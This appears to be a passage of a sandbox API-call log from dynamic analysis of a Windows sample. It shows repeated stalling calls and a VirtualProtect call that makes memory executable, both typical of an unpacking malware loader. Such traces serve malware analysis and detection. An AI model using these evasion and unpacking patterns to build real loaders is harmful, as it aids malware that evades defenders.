lpUserTime=0x18fa3c) returned 1 [0130.380] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0130.380] GetACP () returned 0x4e4 [0130.380] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0130.380] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0130.380] GetACP () returned 0x4e4 [0130.380] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0130.381] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0130.381] GetACP () returned 0x4e4 [0130.381] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0130.381] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0130.381] GetACP () returned 0x4e4 [0130.381] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0130.381] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0130.381] GetACP () returned 0x4e4 [0130.381] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0130.381] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0130.381] GetACP () returned 0x4e4 [0130.381] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0130.381] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0130.381] GetACP () returned 0x4e4 [0130.381] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0130.381] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0130.381] GetACP () returned 0x4e4 [0130.381] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0130.381] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0130.381] GetACP () returned 0x4e4 [0130.382] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0130.382] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0130.382] GetACP () returned 0x4e4 [0130.382] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0130.382] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0130.382] GetACP () returned 0x4e4 [0130.382] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0130.382] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0130.382] GetACP () returned 0x4e4 [0130.382] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0130.382] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0130.382] GetACP () returned 0x4e4 [0130.382] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0130.382] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0130.382] GetACP () returned 0x4e4 [0130.382] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0130.382] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0130.382] GetACP () returned 0x4e4 [0130.382] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0130.383] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0130.383] GetACP () returned 0x4e4 [0130.383] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0130.383] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0130.383] GetACP () returned 0x4e4 [0130.383] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0130.383] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0130.383] GetACP () returned 0x4e4 [0130.570] VirtualProtect (in: lpAddress=0x285ab8, dwSize=0xf540, flNewProtect=0x40, lpflOldProtect=0x43b444 | out: lpflOldProtect=0x43b444*=0x4) returned 1 [0130.570] AddAtomA (lpString=0x0) returned 0x0 [0130.570] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.570] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0130.570] AddAtomA (lpString=0x0) returned 0x0 [0130.570] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.570] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0130.570] AddAtomA (lpString=0x0) returned 0x0 [0130.570] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.571] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0130.571] AddAtomA (lpString=0x0) returned 0x0 [0130.571] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.571] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0130.571] AddAtomA (lpString=0x0) returned 0x0 [0130.571] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.571] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0130.571] AddAtomA (lpString=0x0) returned 0x0 [0130.571] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.571] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0130.571] AddAtomA (lpString=0x0) returned 0x0 [0130.571] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.571] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0130.571] AddAtomA (lpString=0x0) returned 0x0 [0130.571] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.571] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0130.571] AddAtomA (lpString=0x0) returned 0x0 [0130.571] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.571] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0130.571] AddAtomA (lpString=0x0) returned 0x0 [0130.571] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.571] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0130.571] AddAtomA (lpString=0x0) returned 0x0 [0130.571] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.571] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0130.571] AddAtomA (lpString=0x0) returned 0x0 [0130.571] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.571] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0130.571] AddAtomA (lpString=0x0) returned 0x0 [0130.571] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.571] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0130.571] AddAtomA (lpString=0x0) returned 0x0 [0130.571] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.572] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0130.572] AddAtomA (lpString=0x0) returned 0x0 [0130.572] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.572] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0130.572] AddAtomA (lpString=0x0) returned 0x0 [0130.572] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.572] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0130.572] AddAtomA (lpString=0x0) returned 0x0 [0130.572] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.572] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0130.572] AddAtomA (lpString=0x0) returned 0x0 [0130.572] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.572] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0130.572] AddAtomA (lpString=0x0) returned 0x0 [0130.572] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.572] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0130.572] AddAtomA (lpString=0x0) returned 0x0 [0130.572] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.572] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0130.572] AddAtomA (lpString=0x0) returned 0x0 [0130.572] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.572] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0130.572] AddAtomA (lpString=0x0) returned 0x0 [0130.572] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.572] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0130.572] AddAtomA (lpString=0x0) returned 0x0 [0130.572] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.572] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0130.572] AddAtomA (lpString=0x0) returned 0x0 [0130.572] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.572] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0130.572] AddAtomA (lpString=0x0) returned 0x0 [0130.573] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.573] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0130.573] AddAtomA (lpString=0x0) returned 0x0 [0130.573] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.573] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0130.573] AddAtomA (lpString=0x0) returned 0x0 [0130.573] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.573] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0130.573] AddAtomA (lpString=0x0) returned 0x0 [0130.573] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.573] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0130.573] AddAtomA (lpString=0x0) returned 0x0 [0130.573] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.573] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0130.573] AddAtomA (lpString=0x0) returned 0x0 [0130.573] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.573] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0130.573] AddAtomA (lpString=0x0) returned 0x0 [0130.573] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.573] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0130.573] AddAtomA (lpString=0x0) returned 0x0 [0130.573] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.573] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0130.573] AddAtomA (lpString=0x0) returned 0x0 [0130.573] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.573] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0130.573] AddAtomA (lpString=0x0) returned 0x0 [0130.573] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.573] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0130.573] AddAtomA (lpString=0x0) returned 0x0 [0130.573] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.573] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0130.574] AddAtomA (lpString=0x0) returned 0x0 [0130.574] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.574] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0130.574] AddAtomA (lpString=0x0) returned 0x0 [0130.574] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.574] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0130.574] AddAtomA (lpString=0x0) returned 0x0 [0130.574] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.574] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0130.574] AddAtomA (lpString=0x0) returned 0x0 [0130.574] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.574] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0130.574] AddAtomA (lpString=0x0) returned 0x0 [0130.574] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.574] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0130.574] AddAtomA (lpString=0x0) returned 0x0 [0130.574] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.574] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0130.574] AddAtomA (lpString=0x0) returned 0x0 [0130.574] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.574] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0130.574] AddAtomA (lpString=0x0) returned 0x0 [0130.574] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.574] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0130.574] AddAtomA (lpString=0x0) returned 0x0 [0130.574] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.574] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0130.574] AddAtomA (lpString=0x0) returned 0x0 [0130.574] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.575] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0130.575] AddAtomA (lpString=0x0) returned 0x0 [0130.575] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.575] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0130.575] AddAtomA (lpString=0x0) returned 0x0 [0130.575] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.575] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0130.575] AddAtomA (lpString=0x0) returned 0x0 [0130.575] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.575] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0130.575] AddAtomA (lpString=0x0) returned 0x0 [0130.575] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.575] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0130.575] AddAtomA (lpString=0x0) returned 0x0 [0130.575] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.575] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0130.575] AddAtomA (lpString=0x0) returned 0x0 [0130.575] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.575] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0130.575] AddAtomA (lpString=0x0) returned 0x0 [0130.575] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.575] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0130.575] AddAtomA (lpString=0x0) returned 0x0 [0130.575] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.575] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0130.575] AddAtomA (lpString=0x0) returned 0x0 [0130.575] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.575] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0130.575] AddAtomA (lpString=0x0) returned 0x0 [0130.575] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.575] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0130.575] AddAtomA (lpString=0x0) returned 0x0 [0130.575] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.576] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0130.576] AddAtomA (lpString=0x0) returned 0x0 [0130.576] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.576] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0130.576] AddAtomA (lpString=0x0) returned 0x0 [0130.576] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.576] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0130.576] AddAtomA (lpString=0x0) returned 0x0 [0130.576] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.576] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0130.576] AddAtomA (lpString=0x0) returned 0x0 [0130.576] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.576] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0130.576] AddAtomA (lpString=0x0) returned 0x0 [0130.576] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.576] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0130.576] AddAtomA (lpString=0x0) returned 0x0 [0130.576] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.576] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0130.576] AddAtomA (lpString=0x0) returned 0x0 [0130.576] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.576] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0130.576] AddAtomA (lpString=0x0) returned 0x0 [0130.576] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.576] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0130.576] AddAtomA (lpString=0x0) returned 0x0 [0130.576] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.576] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0130.576] AddAtomA (lpString=0x0) returned 0x0 [0130.576] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.576] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0130.576] AddAtomA (lpString=0x0) returned 0x0 [0130.577] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.577] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0130.577] AddAtomA (lpString=0x0) returned 0x0 [0130.577] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.577] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0130.577] AddAtomA (lpString=0x0) returned 0x0 [0130.577] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.577] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0130.577] AddAtomA (lpString=0x0) returned 0x0 [0130.577] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.577] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0130.577] AddAtomA (lpString=0x0) returned 0x0 [0130.577] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.577] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0130.577] AddAtomA (lpString=0x0) returned 0x0 [0130.577] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.577] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0130.577] AddAtomA (lpString=0x0) returned 0x0 [0130.577] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.577] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0130.577] AddAtomA (lpString=0x0) returned 0x0 [0130.577] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.577] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0130.577] AddAtomA (lpString=0x0) returned 0x0 [0130.577] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.577] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0130.577] AddAtomA (lpString=0x0) returned 0x0 [0130.577] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.577] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0130.577] AddAtomA (lpString=0x0) returned 0x0 [0130.577] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.577] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0130.577] AddAtomA (lpString=0x0) returned 0x0 [0130.578] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.578] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0130.578] AddAtomA (lpString=0x0) returned 0x0 [0130.578] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.578] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0130.578] AddAtomA (lpString=0x0) returned 0x0 [0130.578] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.578] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0130.578] AddAtomA (lpString=0x0) returned 0x0 [0130.578] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.578] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0130.578] AddAtomA (lpString=0x0) returned 0x0 [0130.578] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.578] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0130.578] AddAtomA (lpString=0x0) returned 0x0 [0130.578] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.578] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0130.578] AddAtomA (lpString=0x0) returned 0x0 [0130.578] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.578] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0130.578] AddAtomA (lpString=0x0) returned 0x0 [0130.578] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.578] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0130.578] AddAtomA (lpString=0x0) returned 0x0 